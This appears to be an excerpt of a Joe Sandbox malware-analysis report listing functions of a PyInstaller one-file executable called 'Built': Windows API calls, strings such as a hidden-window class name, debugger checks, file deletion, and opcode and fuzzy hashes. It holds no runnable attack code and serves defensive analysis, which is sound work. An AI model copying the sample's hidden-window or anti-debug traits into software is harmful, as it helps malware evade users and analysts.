Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction ID: 2bf0ff5176d4ec4f0db51885bd11526d9dfb6d2915a44a865c1ee82f8342a4e4
Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction Fuzzy Hash: B731BC71A1864386EB505B699C5237C2650BF80B94F420135E92D937D3CF7EA841AF23

Function 00007FF626656004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF626655F69

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 2c4e2b31da8693a1c6bd18d1e148f76c901f399f5fa8e74a3c6186818cfd95c5
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: FC113322A1C64282EE609F51AC0617EA264BFC5B84F554031EB4CD7A97DF3FE540AF03

Function 00007FF6266663C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6266663E7

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction ID: 3d8171733539e834dccf6e7ebd3eec6aa2586efd80bdd260be4ee267cc2bfb07
Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction Fuzzy Hash: EC219572618A8286DF618F18F88137976A0FB84B94F244234E69DC76D5DF3ED8009F03

Function 00007FF62665042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF626650480

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: b72a2586c355e1571f14289c0352343f8043bef44ffe24a25b0d99a6c6feba17
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: C101C421A0878281EE04DF529D02169B691BF95FE0F184631EE5C97BD7CE3EE0116B03

Function 00007FF626649070 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF626649400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6266445E4,00000000,00007FF626641985), ref: 00007FF626649439

LoadLibraryExW.KERNEL32(?,00007FF626646466,?,00007FF62664336E), ref: 00007FF626649092

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: ByteCharLibraryLoadMultiWide
String ID:
API String ID: 2592636585-0
Opcode ID: 7140f7c55cf735ced6a4f02887063d730e60c19ae08c919a697b9dfe54228ee6
Instruction ID: e2ae2faabe2693e46bdad10fd5307cd2828c8d273afb7ebc4114f1d94693b908
Opcode Fuzzy Hash: 7140f7c55cf735ced6a4f02887063d730e60c19ae08c919a697b9dfe54228ee6
Instruction Fuzzy Hash: 8FD08C11B2828641EE54A76BBA466295251BFC9BC4E888035EE1D43B4ADC3DC0514B01

Function 00007FFDF1457DF0 Relevance: 1.3, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFDF1457E21

Memory Dump Source

Source File: 00000005.00000002.2093117630.00007FFDF1441000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDF1440000, based on PE: true

Associated: 00000005.00000002.2093030842.00007FFDF1440000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093117630.00007FFDF14B3000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093117630.00007FFDF14B6000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093117630.00007FFDF14D9000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093117630.00007FFDF14E4000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093117630.00007FFDF14EE000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093710336.00007FFDF14F1000.00000080.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093754080.00007FFDF14F3000.00000004.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf1440000_Built.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 8e011317cca6565eb200d0702bfa620ad3ccf4c4be6080c5c317d346bd03422b
Instruction ID: 27578453e763e3208009041be784ac6e7660f83d894d5138d4762e0542ec81c5
Opcode Fuzzy Hash: 8e011317cca6565eb200d0702bfa620ad3ccf4c4be6080c5c317d346bd03422b
Instruction Fuzzy Hash: 31217A32B0878086D754CB26E5906ADB7A9FBC8B90F544135EF9C43B98CF78E555CB04

Function 00007FF62665D66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF626650D00,?,?,?,00007FF62665236A,?,?,?,?,?,00007FF626653B59), ref: 00007FF62665D6AA

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction ID: 9cf904d9af9fda3d3e472da0eb2d2e5a5741f22c8af222092ad4e0c6ce2fb6e9
Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction Fuzzy Hash: 6EF0FE10B0934785FE5467729D5267922907F957A0F080730ED2ED57D3DE2EA441AF17

Non-executed Functions

Function 00007FF626648BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF626649400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6266445E4,00000000,00007FF626641985), ref: 00007FF626649439

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648C2B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648C46

Part of subcall function 00007FF62665A4EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62665A500

Part of subcall function 00007FF62665878C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6266587F3

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648CD6
CreateProcessW.KERNEL32 ref: 00007FF626648D0E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648D18

Part of subcall function 00007FF626642C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF626643706,?,00007FF626643804), ref: 00007FF626642C9E
Part of subcall function 00007FF626642C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF626643706,?,00007FF626643804), ref: 00007FF626642D63
Part of subcall function 00007FF626642C50: MessageBoxW.USER32 ref: 00007FF626642D99

RegisterClassW.USER32 ref: 00007FF626648D70
GetLastError.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648D7B
CreateWindowExW.USER32 ref: 00007FF626648DC5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648DD7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648DF2
GetLastError.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648E05
PeekMessageW.USER32 ref: 00007FF626648E29
TranslateMessage.USER32 ref: 00007FF626648E37
DispatchMessageW.USER32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648E41
PeekMessageW.USER32 ref: 00007FF626648E5C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648E6E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648E89
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648E9F
GetLastError.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648EA9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648EB7
DestroyWindow.USER32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648FF4
GetExitCodeProcess.KERNEL32 ref: 00007FF626649009
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626649012
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF62664901F

Strings

CreateProcessW, xrefs: 00007FF626648D27
PyInstallerOnefileHiddenWindow, xrefs: 00007FF626648D44
Failed to create child process!, xrefs: 00007FF626648D20
PyInstaller Onefile Hidden Window, xrefs: 00007FF626648D85

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction ID: 49114583f7f9625af0ff0251d2200d444366a34717454b278500218c095fc9e7
Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction Fuzzy Hash: 35D19E32A08A8386EF209F34EC542A97764FB84B58F400239DA5D93AA8DF3DD554DB43

Function 00007FFDF10C266C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 168COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FFDF128DCB1
GetEnvironmentVariableW.KERNEL32 ref: 00007FFDF128DCD2
GetEnvironmentVariableW.KERNEL32 ref: 00007FFDF128DCED
GetEnvironmentVariableW.KERNEL32 ref: 00007FFDF128DD08
GetEnvironmentVariableW.KERNEL32 ref: 00007FFDF128DD50
WideCharToMultiByte.KERNEL32 ref: 00007FFDF128DD86
WideCharToMultiByte.KERNEL32 ref: 00007FFDF128DDDB

Strings

.rnd, xrefs: 00007FFDF128DE8A
HOME, xrefs: 00007FFDF128DCC0
SYSTEMROOT, xrefs: 00007FFDF128DCF9
USERPROFILE, xrefs: 00007FFDF128DCDE
RANDFILE, xrefs: 00007FFDF128DC99

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: EnvironmentVariable$ByteCharMultiWide
String ID: .rnd$HOME$RANDFILE$SYSTEMROOT$USERPROFILE
API String ID: 2184640988-1666712896
Opcode ID: 419c88fdedd40b7a4bd6282dbefca93637e627fdfe4ba8766129e23dca955196
Instruction ID: ecbee0855c7df65d48c945f56745a855ef5c11c2a4b046c09b0103f63563e1ed
Opcode Fuzzy Hash: 419c88fdedd40b7a4bd6282dbefca93637e627fdfe4ba8766129e23dca955196
Instruction Fuzzy Hash: 1161E62670878286EB109F66A46097967A9FF55BB4B488232DE3D877DCDF3DD0098300

Function 00007FFDF0FA30E8 Relevance: 13.6, APIs: 9, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFDF0FA3104
00007FFE103019A0.VCRUNTIME140 ref: 00007FFDF0FA3128
RtlCaptureContext.KERNEL32 ref: 00007FFDF0FA3131
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFDF0FA314B
RtlVirtualUnwind.KERNEL32 ref: 00007FFDF0FA318C
00007FFE103019A0.VCRUNTIME140 ref: 00007FFDF0FA31BF
IsDebuggerPresent.KERNEL32 ref: 00007FFDF0FA31E0
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFDF0FA3201
UnhandledExceptionFilter.KERNEL32 ref: 00007FFDF0FA320C

Memory Dump Source

Source File: 00000005.00000002.2090834885.00007FFDF0FA1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FFDF0FA0000, based on PE: true

Associated: 00000005.00000002.2090802749.00007FFDF0FA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF1004000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF1050000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF1053000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF10AC000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF10B1000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF10B4000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2091138354.00007FFDF10B5000.00000080.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2091174931.00007FFDF10B7000.00000004.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf0fa0000_Built.jbxd

Similarity

API ID: 00007E103019ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 2662681558-0
Opcode ID: d7e82cabd9796a5cc19c6e8637579e4198f8c251196789a756a290bf3cbab7b6
Instruction ID: ff856534e1a0b642073ca8378bbbd578e64e7a98fc3f38c82b0f7a4405f01c14
Opcode Fuzzy Hash: d7e82cabd9796a5cc19c6e8637579e4198f8c251196789a756a290bf3cbab7b6
Instruction Fuzzy Hash: 76314C72709B8186EB608F60E864BEE7364FB84758F44813ADA5E4BB98DF3CD548C710

Function 00007FF6266483B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF62664841B
RemoveDirectoryW.KERNEL32(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF62664849E
DeleteFileW.KERNEL32(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF6266484BD
FindNextFileW.KERNEL32(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF6266484CB
FindClose.KERNEL32(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF6266484DC
RemoveDirectoryW.KERNEL32(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF6266484E5

Strings

%s\*, xrefs: 00007FF6266483E2

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction ID: 466e76af0ee52c08d8733a8b641580a35883307bcb1a5e1f87eab11825cf6532
Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction Fuzzy Hash: 9A419121A0CA8395EE309B25EC641B96364FB94794F800236D69DC36C4DF7ED54ADF43

Function 00007FFDF10C3229 Relevance: 12.3, APIs: 8, Instructions: 251fileCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FFDF126400F
GetLastError.KERNEL32 ref: 00007FFDF126401C
MultiByteToWideChar.KERNEL32 ref: 00007FFDF1264043
MultiByteToWideChar.KERNEL32 ref: 00007FFDF1264098
00007FFE1FF9F020.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDF12640A9
FindFirstFileW.KERNEL32 ref: 00007FFDF126421C
FindNextFileW.KERNEL32 ref: 00007FFDF1264259
WideCharToMultiByte.KERNEL32 ref: 00007FFDF12642B7

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: ByteCharMultiWide$FileFind$00007ErrorF020FirstLastNext
String ID:
API String ID: 1171239525-0
Opcode ID: b84a2f744cee5a13916b1079a4c81b9897484e08d179ab741295abe408a7cb8c
Instruction ID: 03755dddcac558e8441371d45a171186d814b11fc610719c4b1fb68190b38cbc
Opcode Fuzzy Hash: b84a2f744cee5a13916b1079a4c81b9897484e08d179ab741295abe408a7cb8c
Instruction Fuzzy Hash: 6FB1C632B04A8286EB108FA5D465A7977A8FF59BA4F544335DABD837D8EF3CD0458300

Function 00007FFDF10C5A1F Relevance: 10.6, APIs: 7, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFDF1305BBC
RtlCaptureContext.KERNEL32 ref: 00007FFDF1305BE9
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFDF1305C03
RtlVirtualUnwind.KERNEL32 ref: 00007FFDF1305C44
IsDebuggerPresent.KERNEL32 ref: 00007FFDF1305C98
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFDF1305CB9
UnhandledExceptionFilter.KERNEL32 ref: 00007FFDF1305CC4

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

